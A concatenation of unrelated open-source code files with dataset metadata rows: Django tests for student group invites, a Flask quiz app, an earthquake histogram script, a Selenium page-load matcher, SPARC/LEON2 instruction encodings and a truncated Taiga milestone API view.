sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
self.assertEqual(invite.sent_to, sent_to)
self.assertEqual(invite.sent_by, sent_by)
self.assertEqual(invite.group, testgroup)
self.assertIsNotNone(invite.sent_datetime)
def test_sanity_accepted(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to,
accepted=True
)
invite.full_clean()
self.assertEqual(invite.sent_to, sent_to)
self.assertEqual(invite.sent_by, sent_by)
self.assertEqual(invite.group, testgroup)
self.assertTrue(invite.accepted)
self.assertIsNotNone(invite.responded_datetime)
class TestGroupInviteQueryset(TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_queryset_sanity(self):
baker.make('core.GroupInvite', id=100)
self.assertEqual(GroupInvite.objects.all().first().id, 100)
def test_filter_accepted(self):
baker.make('core.GroupInvite', accepted=None, id=10)
baker.make('core.GroupInvite', accepted=False, id=11)
baker.make('core.GroupInvite', accepted=True, id=100)
baker.make('core.GroupInvite', accepted=True, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_accepted()),
{100, 101}
)
def test_filter_no_response(self):
baker.make('core.GroupInvite', accepted=None, id=10)
baker.make('core.GroupInvite', accepted=None, id=11)
baker.make('core.GroupInvite', accepted=True, id=100)
baker.make('core.GroupInvite', accepted=False, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_no_response()),
{10, 11}
)
def test_filter_rejected(self):
baker.make('core.GroupInvite', accepted=False, id=10)
baker.make('core.GroupInvite', accepted=False, id=11)
baker.make('core.GroupInvite', accepted=True, id=100)
baker.make('core.GroupInvite', accepted=None, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_rejected()),
{10, 11}
)
def test_filter_unanswered_received_invites(self):
group = baker.make('core.AssignmentGroup')
sent_by = core_baker.candidate(group=group).relatedstudent.user
sent_to = core_baker.candidate(group=group).relatedstudent.user
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=False, id=10)
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=None, id=11)
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=True, id=100)
baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=None, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_unanswered_received_invites(sent_to)),
{11, 101}
)
def test_filter_unanswered_sent_invites(self):
group = baker.make('core.AssignmentGroup')
baker.make('core.GroupInvite', group=group, accepted=False, id=10)
baker.make('core.GroupInvite', group=group, accepted=None, id=11)
baker.make('core.GroupInvite', group=group, accepted=True, id=100)
baker.make('core.GroupInvite', group=group, accepted=None, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_unanswered_sent_invites(group)),
{11, 101}
)
def test_filter_allowed_to_create_groups(self):
assignment_expired = baker.make(
'core.Assignment',
students_can_create_groups=True,
students_can_not_create_groups_after=timezone.now() - timedelta(days=1)
)
assignment_not_expired = baker.make(
'core.Assignment',
students_can_create_groups=True,
students_can_not_create_groups_after=timezone.now() + timedelta(days=1)
)
assignment_not_allowed = baker.make('core.Assignment', students_can_create_groups=False)
assignment_allowed = baker.make('core.Assignment', students_can_create_groups=True)
group1 = baker.make('core.AssignmentGroup', parentnode=assignment_expired)
group2 = baker.make('core.AssignmentGroup', parentnode=assignment_not_expired)
group3 = baker.make('core.AssignmentGroup', parentnode=assignment_not_allowed)
group4 = baker.make('core.AssignmentGroup', parentnode=assignment_allowed)
baker.make('core.GroupInvite', group=group1, id=10)
baker.make('core.GroupInvite', group=group2, id=11)
baker.make('core.GroupInvite', group=group3, id=100)
baker.make('core.GroupInvite', group=group4, id=101)
self.assertEqual(
set(invite.id for invite in GroupInvite.objects.filter_allowed_to_create_groups()),
{11, 101}
)
class FakeRequest(object):
def build_absolute_uri(self, location):
return 'http://example.com{}'.format(location)
class GroupInviteRespond(TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def __fake_request(self):
return FakeRequest()
def test_respond_reject(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
invite.respond(False)
self.assertFalse(GroupInvite.objects.get(id=invite.id).accepted)
group = AssignmentGroup.objects.filter_user_is_candidate(student2)
self.assertEqual(group.count(), 1)
self.assertEqual(group.first().id, group2.id)
def test_respond_accept(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
invite.respond(True)
self.assertTrue(GroupInvite.objects.get(id=invite.id).accepted)
group = AssignmentGroup.objects.filter_user_is_candidate(student2)
self.assertEqual(group.count(), 1)
self.assertEqual(group.first().id, group1.id)
self.assertEqual(group.first().cached_data.candidate_count, 2)
self.assertFalse(AssignmentGroup.objects.filter(id=group2.id).exists())
def test_num_queries_accept(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
with self.assertNumQueries(36):
invite.respond(True)
def test_num_queries_reject(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
student1 = core_baker.candidate(group=group1).relatedstudent.user
student2 = core_baker.candidate(group=group2).relatedstudent.user
invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1)
with self.assertNumQueries(9):
invite.respond(False)
def test_send_invite_mail(self):
assignment = baker.make(
'core.Assignment',
long_name='Assignment 1',
short_name='assignment1',
parentnode__long_name='Spring2017',
parentnode__short_name='s17',
parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming',
parentnode__parentnode__short_name='Duck1010',
students_can_create_groups=True,
)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
sent_by = core_baker.candidate(testgroup, shortname="[email protected]", fullname="April").relatedstudent.user
sent_to = core_baker.candidate(testgroup1, shortname="[email protected]", fullname="Dewey").relatedstudent.user
baker.make('devilry_account.UserEmail', user=sent_to, email="[email protected]")
invite = GroupInvite(group=testgroup, sent_by=sent_by, sent_to=sent_to)
invite.full_clean()
invite.save()
request = self.__fake_request()
invite.send_invite_notification(request)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, '[Devilry] Project group invite for Duck1010.s17.assignment1')
url = request.build_absolute_uri(
reverse('devilry_student_groupinvite_respond', kwargs={'invite_id': invite.id}))
self.assertIn(url, mail.outbox[0].body)
def test_send_reject_mail(self):
assignment = baker.make(
'core.Assignment',
long_name='Assignment 1',
short_name='assignment1',
parentnode__long_name='Spring2017',
parentnode__short_name='s17',
parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming',
parentnode__parentnode__short_name='Duck1010',
students_can_create_groups=True,
)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
sent_by = core_baker.candidate(testgroup, shortname="[email protected]", fullname="April").relatedstudent.user
sent_to = core_baker.candidate(testgroup1, shortname="[email protected]", fullname="Dewey").relatedstudent.user
baker.make('devilry_account.UserEmail', user=sent_to, email="[email protected]")
baker.make('devilry_account.UserEmail', user=sent_by, email="[email protected]")
invite = GroupInvite(
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
invite.save()
invite.send_invite_notification(self.__fake_request())
invite.respond(False)
self.assertEqual(len(mail.outbox), 2)
self.assertEqual(mail.outbox[1].subject, '[Devilry] Dewey rejected your project group invite')
def test_send_accept_mail(self):
assignment = baker.make(
'core.Assignment',
long_name='Assignment 1',
short_name='assignment1',
parentnode__long_name='Spring2017',
parentnode__short_name='s17',
parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming',
parentnode__parentnode__short_name='Duck1010',
students_can_create_groups=True,
)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
sent_by = core_baker.candidate(testgroup, shortname="[email protected]", fullname="April").relatedstudent.user
sent_to = core_baker.candidate(testgroup1, shortname="[email protected]", fullname="Dewey").relatedstudent.user
baker.make('devilry_account.UserEmail', user=sent_to, email="[email protected]")
baker.make('devilry_account.UserEmail', user=sent_by, email="[email protected]")
invite = GroupInvite(
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
invite.save()
invite.send_invite_notification(self.__fake_request())
invite.respond(True)
self.assertEqual(len(mail.outbox), 2)
self.assertEqual(mail.outbox[1].subject, '[Devilry] Dewey accepted your project group invite')
def test_send_invite_to_choices_queryset(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group3 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group4 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
core_baker.candidate(group=group1, fullname="Louie", shortname="louie")
core_baker.candidate(group=group2, fullname="Huey", shortname="huey")
core_baker.candidate(group=group2, fullname="Donald", shortname="donald")
candidate4 = core_baker.candidate(group=group3, fullname="April", shortname="april")
candidate5 = core_baker.candidate(group=group4, fullname="Dewey", shortname="dewey")
candidates = GroupInvite.send_invite_to_choices_queryset(group1)
self.assertEqual(candidates.count(), 2)
self.assertEqual(
set(candidate.id for candidate in candidates),
{candidate4.id, candidate5.id}
)
def test_send_invite_to_choices_queryset_pending_is_excluded(self):
group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group3 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
group4 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode)
candidate1 = core_baker.candidate(group=group1, fullname="Louie", shortname="louie")
core_baker.candidate(group=group2, fullname="Huey", shortname="huey")
core_baker.candidate(group=group2, fullname="Donald", shortname="donald")
candidate4 = core_baker.candidate(group=group3, fullname="April", shortname="april")
candidate5 = core_baker.candidate(group=group4, fullname="Dewey", shortname="dewey")
baker.make(
'core.GroupInvite',
group=group1,
sent_to=candidate4.relatedstudent.user,
sent_by=candidate1.relatedstudent.user
)
candidates = GroupInvite.send_invite_to_choices_queryset(group1)
self.assertEqual(candidates.count(), 1)
self.assertEqual(
set(candidate.id for candidate in candidates),
{candidate5.id}
)
def test_validate_user_id_send_to(self):
assignment = baker.make('core.Assignment', students_can_create_groups=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment)
core_baker.candidate(testgroup)
sent_to = core_baker.candidate(testgroup1)
with self.assertNumQueries(1):
GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id)
def test_validation_user_id_send_to_error_wrong_assignment(self):
assignment = baker.make('core.Assignment', students_can_create_groups=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
testgroup1 = baker.make('core.AssignmentGroup')
core_baker.candidate(testgroup)
sent_to = core_baker.candidate(testgroup1)
with self.assertRaisesMessage(ValidationError, 'The selected student is not eligible to join the group.'):
GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id)
def test_validation_user_id_send_to_error_already_in_group(self):
assignment = baker.make('core.Assignment', students_can_create_groups=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
core_baker.candidate(testgroup)
sent_to = core_baker.candidate(testgroup)
with self.assertRaisesMessage(ValidationError, 'The selected student is not eligible to join the group.'):
GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id)
def test_invite_has_already_been_accepted(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=True)
with self.assertRaisesMessage(ValidationError, 'This invite has already been accepted.'):
invite.respond(True)
def test_invite_has_already_been_declined(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
invite = baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=False)
with self.assertRaisesMessage(ValidationError, 'This invite has already been declined.'):
invite.respond(False)
| bsd-3-clause | -7,695,764,086,700,360,000 | 48.947791 | 119 | 0.659564 | false |
koduj-z-klasa/python101 | docs/webflask/quiz_orm/quiz2_pw/views.py | 1 | 4117 | # -*- coding: utf-8 -*-
# quiz-orm/views.py
from flask import render_template, request, redirect, url_for, abort, flash
from app import app
from models import Pytanie, Odpowiedz
from forms import *
@app.route('/')
def index():
"""Strona główna"""
return render_template('index.html')
@app.route('/lista')
def lista():
"""Pobranie wszystkich pytań z bazy i zwrócenie szablonu z listą pytań"""
pytania = Pytanie().select().annotate(Odpowiedz)
if not pytania.count():
flash('Brak pytań w bazie.', 'kom')
return redirect(url_for('index'))
return render_template('lista.html', pytania=pytania)
@app.route('/quiz', methods=['GET', 'POST'])
def quiz():
"""Wyświetlenie pytań i odpowiedzi w formie quizu oraz ocena poprawności
przesłanych odpowiedzi"""
if request.method == 'POST':
wynik = 0
for pid, odp in request.form.items():
odpok = Pytanie.select(Pytanie.odpok).where(
Pytanie.id == int(pid)).scalar()
if odp == odpok:
wynik += 1
flash('Liczba poprawnych odpowiedzi, to: {0}'.format(wynik), 'sukces')
return redirect(url_for('index'))
# GET, wyświetl pytania
pytania = Pytanie().select().annotate(Odpowiedz)
if not pytania.count():
flash('Brak pytań w bazie.', 'kom')
return redirect(url_for('index'))
return render_template('quiz.html', pytania=pytania)
def flash_errors(form):
"""Odczytanie wszystkich błędów formularza i przygotowanie komunikatów"""
for field, errors in form.errors.items():
for error in errors:
if type(error) is list:
error = error[0]
flash("Błąd: {}. Pole: {}".format(
error,
getattr(form, field).label.text))
@app.route('/dodaj', methods=['GET', 'POST'])
def dodaj():
"""Dodawanie pytań i odpowiedzi"""
form = DodajForm()
if form.validate_on_submit():
odp = form.odpowiedzi.data
p = Pytanie(pytanie=form.pytanie.data, odpok=odp[int(form.odpok.data)])
p.save()
for o in odp:
inst = Odpowiedz(pnr=p.id, odpowiedz=o)
inst.save()
flash("Dodano pytanie: {}".format(form.pytanie.data))
return redirect(url_for("lista"))
elif request.method == 'POST':
flash_errors(form)
return render_template("dodaj.html", form=form, radio=list(form.odpok))
def get_or_404(pid):
"""Pobranie i zwrócenie obiektu z bazy lub wywołanie szablonu 404.html"""
try:
p = Pytanie.select().annotate(Odpowiedz).where(Pytanie.id == pid).get()
return p
except Pytanie.DoesNotExist:
abort(404)
@app.errorhandler(404)
def page_not_found(e):
"""Zwrócenie szablonu 404.html w przypadku nie odnalezienia strony"""
return render_template('404.html'), 404
@app.route('/edytuj/<int:pid>', methods=['GET', 'POST'])
def edytuj(pid):
"""Edycja pytania o identyfikatorze pid i odpowiedzi"""
p = get_or_404(pid)
form = DodajForm()
if form.validate_on_submit():
odp = form.odpowiedzi.data
p.pytanie = form.pytanie.data
p.odpok = odp[int(form.odpok.data)]
p.save()
for i, o in enumerate(p.odpowiedzi):
o.odpowiedz = odp[i]
o.save()
flash("Zaktualizowano pytanie: {}".format(form.pytanie.data))
return redirect(url_for("lista"))
elif request.method == 'POST':
flash_errors(form)
for i in range(3):
if p.odpok == p.odpowiedzi[i].odpowiedz:
p.odpok = i
break
form = DodajForm(obj=p)
return render_template("edytuj.html", form=form, radio=list(form.odpok))
@app.route('/usun/<int:pid>', methods=['GET', 'POST'])
def usun(pid):
"""Usunięcie pytania o identyfikatorze pid"""
p = get_or_404(pid)
if request.method == 'POST':
flash('Usunięto pytanie {0}'.format(p.pytanie), 'sukces')
p.delete_instance(recursive=True)
return redirect(url_for('index'))
return render_template("pytanie_usun.html", pytanie=p)
| mit | 5,689,004,494,325,511,000 | 30.236641 | 79 | 0.611193 | false |
PyQuake/earthquakemodels | code/runExperiments/histogramMagnitude.py | 1 | 1982 | import matplotlib.pyplot as plt
import models.model as model
import earthquake.catalog as catalog
from collections import OrderedDict
def histogramMagnitude(catalog_, region):
"""
Creates the histogram of magnitudes by a given region.
Saves the histogram to the follwing path ./code/Zona2/histograms/'+region+'/Magnitude Histogram of ' + str(year) + " " + region + '.png'
Where region, year are given by the application
From 2000 to 2011
"""
definition = model.loadModelDefinition('../params/' + region + '.txt')
catalogFiltred = catalog.filter(catalog_, definition)
year = 2000
while(year < 2012):
data = dict()
for i in range(len(catalogFiltred)):
if catalogFiltred[i]['year'] == year and catalogFiltred[i]['lat'] > 34.8 and catalogFiltred[i][
'lat'] < 37.05 and catalogFiltred[i]['lon'] > 138.8 and catalogFiltred[i]['lon'] < 141.05:
data[catalogFiltred[i]['mag']] = data.get(catalogFiltred[i]['mag'], 0) + 1
b = OrderedDict(sorted(data.items()))
plt.title('Histogram of ' + str(year) + " " + region)
plt.bar(range(len(data)), b.values(), align='center')
plt.xticks(range(len(data)), b.keys(), rotation=25)
# print(b)
axes = plt.gca()
plt.savefig(
'../Zona2/histograms/'+region+'/Magnitude Histogram of ' +
str(year) +
" " +
region +
'.png')
del data
year += 1
def main():
"""
Calls function to plot a hitogram of magnitudes by region, based on JMA catalog
"""
catalog_ = catalog.readFromFile('../data/jmacat_2000_2013.dat')
region = "Kanto"
histogramMagnitude(catalog_, region)
region = "Kansai"
histogramMagnitude(catalog_, region)
region = "Tohoku"
histogramMagnitude(catalog_, region)
region = "EastJapan"
histogramMagnitude(catalog_, region)
if __name__ == "__main__":
main()
| bsd-3-clause | 2,488,482,629,625,943,600 | 35.036364 | 140 | 0.604945 | false |
Skyscanner/pages | test/utils/hamcrest_matchers.py | 1 | 2357 | ############################################################################
# Copyright 2015 Skyscanner Ltd #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
from hamcrest.core.base_matcher import BaseMatcher
from selenium.common.exceptions import TimeoutException
from pages.page import Page
DEFAULT_POLLING_TIME = 0.5
DEFAULT_TIMEOUT = 25
class PageIsLoaded(BaseMatcher):
def __init__(self, timeout):
BaseMatcher.__init__(self)
self.timeout = timeout
self.polling = DEFAULT_POLLING_TIME
self.page_name = None
def _matches(self, page):
self.page_name = page.name
if isinstance(page, Page):
try:
page.wait_until_loaded(self.timeout, self.polling)
return True
except TimeoutException:
return False
def describe_to(self, description):
description.append_text("Expected page {0} to load within {1} ms".format(self.page_name, str(self.timeout)))
def describe_mismatch(self, item, mismatch_description):
mismatch_description.append_text('page load timed out.')
def with_timeout(self, timeout):
self.timeout = timeout
return self
def with_polling(self, polling):
self.polling = polling
return self
def is_loaded(timeout=30):
return PageIsLoaded(timeout)
| apache-2.0 | -6,174,321,162,460,390,000 | 39.637931 | 116 | 0.517183 | false |
socrocket/trap-gen | processors/LEON2/LEONCoding.py | 1 | 5555 | ################################################################################
#
# _/_/_/_/_/ _/_/_/ _/ _/_/_/
# _/ _/ _/ _/_/ _/ _/
# _/ _/ _/ _/ _/ _/ _/
# _/ _/_/_/ _/_/_/_/ _/_/_/
# _/ _/ _/ _/ _/ _/
# _/ _/ _/ _/ _/ _/
#
# @file LEONCoding.py
# @brief This file is part of the TRAP example processors.
# @details Instruction coding definition file for the LEON2.
# @author Luca Fossati
# @date 2008-2013 Luca Fossati
# @copyright
#
# This file is part of TRAP.
#
# TRAP is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# or see <http://www.gnu.org/licenses/>.
#
# (c) Luca Fossati, [email protected], [email protected]
#
################################################################################
import trap
#---------------------------------------------------------
# Instruction Encoding
#---------------------------------------------------------
# Lets now start with defining the instructions, i.e. their bitstring and
# mnemonic and their behavior. Note the zero* field: it is a special identifier and it
# means that all those bits have value 0; the same applies for one*
# As stated in page 44 of "The SPARC Architecture Manual V8" there are
# mainly 6 different format types
# Call instruction format
call_format = trap.MachineCode([('op', 2), ('disp30', 30)])
call_format.setBitfield('op', [0, 1])
# Branch and sethi instructions format
b_sethi_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op2', 3), ('imm22', 22)])
b_sethi_format1.setBitfield('op', [0, 0])
b_sethi_format1.setVarField('rd', ('REGS', 0), 'out')
b_sethi_format2 = trap.MachineCode([('op', 2), ('a', 1), ('cond', 4), ('op2', 3), ('disp22', 22)])
b_sethi_format2.setBitfield('op', [0, 0])
# Memory instruction format
mem_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)])
mem_format1.setBitfield('op', [1, 1])
mem_format1.setVarField('rs1', ('REGS', 0), 'in')
mem_format1.setVarField('rs2', ('REGS', 0), 'in')
mem_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)])
mem_format2.setBitfield('op', [1, 1])
mem_format2.setVarField('rs1', ('REGS', 0), 'in')
# Store Barrier format
stbar_format = trap.MachineCode([('op', 2), ('zero', 5), ('op3', 6), ('rs1', 5), ('zero', 14)])
stbar_format.setBitfield('op', [1, 0])
stbar_format.setBitfield('op3', [1, 0, 1, 0, 0, 0])
stbar_format.setBitfield('rs1', [0, 1, 1, 1, 1])
# logical and remainig instructions format
dpi_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)])
dpi_format1.setBitfield('op', [1, 0])
dpi_format1.setVarField('rd', ('REGS', 0), 'out')
dpi_format1.setVarField('rs1', ('REGS', 0), 'in')
dpi_format1.setVarField('rs2', ('REGS', 0), 'in')
dpi_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)])
dpi_format2.setBitfield('op', [1, 0])
dpi_format2.setVarField('rd', ('REGS', 0), 'out')
dpi_format2.setVarField('rs1', ('REGS', 0), 'in')
# Format for reading special instructions
read_special_format = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('asr', 5), ('zero', 14)])
read_special_format.setBitfield('op', [1, 0])
read_special_format.setVarField('rd', ('REGS', 0), 'out')
# Format for writing special instructions
write_special_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 9), ('rs2', 5)])
write_special_format1.setBitfield('op', [1, 0])
write_special_format1.setVarField('rs1', ('REGS', 0), 'in')
write_special_format1.setVarField('rs2', ('REGS', 0), 'in')
write_special_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)])
write_special_format2.setBitfield('op', [1, 0])
write_special_format2.setVarField('rs1', ('REGS', 0), 'in')
# Trap on integer condition code format
ticc_format1 = trap.MachineCode([('op', 2), ('reserved1', 1), ('cond', 4), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)])
ticc_format1.setBitfield('op', [1, 0])
ticc_format1.setVarField('rs1', ('REGS', 0), 'in')
ticc_format1.setVarField('rs2', ('REGS', 0), 'in')
ticc_format2 = trap.MachineCode([('op', 2), ('reserved1', 1), ('cond', 4), ('op3', 6), ('rs1', 5), ('one', 1), ('reserved2', 6), ('imm7', 7)])
ticc_format2.setBitfield('op', [1, 0])
ticc_format2.setVarField('rs1', ('REGS', 0), 'in')
# Coprocessor of fpu instruction format
coprocessor_format = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('opf', 9), ('rs2', 5)])
coprocessor_format.setBitfield('op', [1, 0])
coprocessor_format.setVarField('rd', ('REGS', 0), 'out')
coprocessor_format.setVarField('rs1', ('REGS', 0), 'in')
coprocessor_format.setVarField('rs2', ('REGS', 0), 'in')
| gpl-3.0 | 6,424,995,192,659,470,000 | 45.680672 | 142 | 0.576598 | false |
bdang2012/taiga-back-casting | taiga/projects/milestones/api.py | 1 | 6149 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.apps import apps
from django.db.models import Prefetch
from taiga.base import filters
from taiga.base import response
from taiga.base.decorators import detail_route
from taiga.base.api import ModelCrudViewSet, ModelListViewSet
from taiga.base.api.utils import get_object_or_404
from taiga.base.utils.db import get_object_or_none
from taiga.projects.notifications.mixins import WatchedResourceMixin, WatchersViewSetMixin
from taiga.projects.history.mixins import HistoryResourceMixin
from taiga.projects.votes.utils import attach_total_voters_to_queryset, attach_is_voter_to_queryset
from taiga.projects.notifications.utils import attach_watchers_to_queryset, attach_is_watcher_to_queryset
from . import serializers
from . import models
from . import permissions
import datetime
class MilestoneViewSet(HistoryResourceMixin, WatchedResourceMixin, ModelCrudViewSet):
serializer_class = serializers.MilestoneSerializer
permission_classes = (permissions.MilestonePermission,)
filter_backends = (filters.CanViewMilestonesFilterBackend,)
filter_fields = ("project", "closed")
queryset = models.Milestone.objects.all()
def list(self, request, *args, **kwargs):
res = super().list(request, *args, **kwargs)
self._add_taiga_info_headers()
return res
def _add_taiga_info_headers(self):
try:
project_id = int(self.request.QUERY_PARAMS.get("project", None))
project_model = apps.get_model("projects", "Project")
project = get_object_or_none(project_model, id=project_id)
except TypeError:
project = None
if project:
opened_milestones = project.milestones.filter(closed=False).count()
closed_milestones = project.milestones.filter(closed=True).count()
self.headers["Taiga-Info-Total-Opened-Milestones"] = opened_milestones
self.headers["Taiga-Info-Total-Closed-Milestones"] = closed_milestones
def get_queryset(self):
qs = super().get_queryset()
# Userstories prefetching
UserStory = apps.get_model("userstories", "UserStory")
us_qs = UserStory.objects.prefetch_related("role_points",
"role_points__points",
"role_points__role")
us_qs = us_qs.select_related("milestone",
"project",
"status",
"owner",
"assigned_to",
"generated_from_issue")
us_qs = self.attach_watchers_attrs_to_queryset(us_qs)
if self.request.user.is_authenticated():
us_qs = attach_is_voter_to_queryset(self.request.user, us_qs)
us_qs = attach_is_watcher_to_queryset(self.request.user, us_qs)
qs = qs.prefetch_related(Prefetch("user_stories", queryset=us_qs))
# Milestones prefetching
qs = qs.select_related("project", "owner")
qs = self.attach_watchers_attrs_to_queryset(qs)
qs = qs.order_by("-estimated_start")
return qs
def pre_save(self, obj):
if not obj.id:
obj.owner = self.request.user
super().pre_save(obj)
@detail_route(methods=['get'])
def stats(self, request, pk=None):
milestone = get_object_or_404(models.Milestone, pk=pk)
self.check_permissions(request, "stats", milestone)
total_points = milestone.total_points
milestone_stats = {
'name': milestone.name,
'estimated_start': milestone.estimated_start,
'estimated_finish': milestone.estimated_finish,
'total_points': total_points,
'completed_points': milestone.closed_points.values(),
'total_userstories': milestone.user_stories.count(),
'completed_userstories': len([us for us in milestone.user_stories.all() if us.is_closed]),
'total_tasks': milestone.tasks.all().count(),
'completed_tasks': milestone.tasks.all().filter(status__is_closed=True).count(),
'iocaine_doses': milestone.tasks.filter(is_iocaine=True).count(),
'days': []
}
current_date = milestone.estimated_start
sumTotalPoints = sum(total_points.values())
optimal_points = sumTotalPoints
milestone_days = (milestone.estimated_finish - milestone.estimated_start).days
optimal_points_per_day = sumTotalPoints / milestone_days if milestone_days else 0
while current_date <= milestone.estimated_finish:
milestone_stats['days'].append({
'day': current_date,
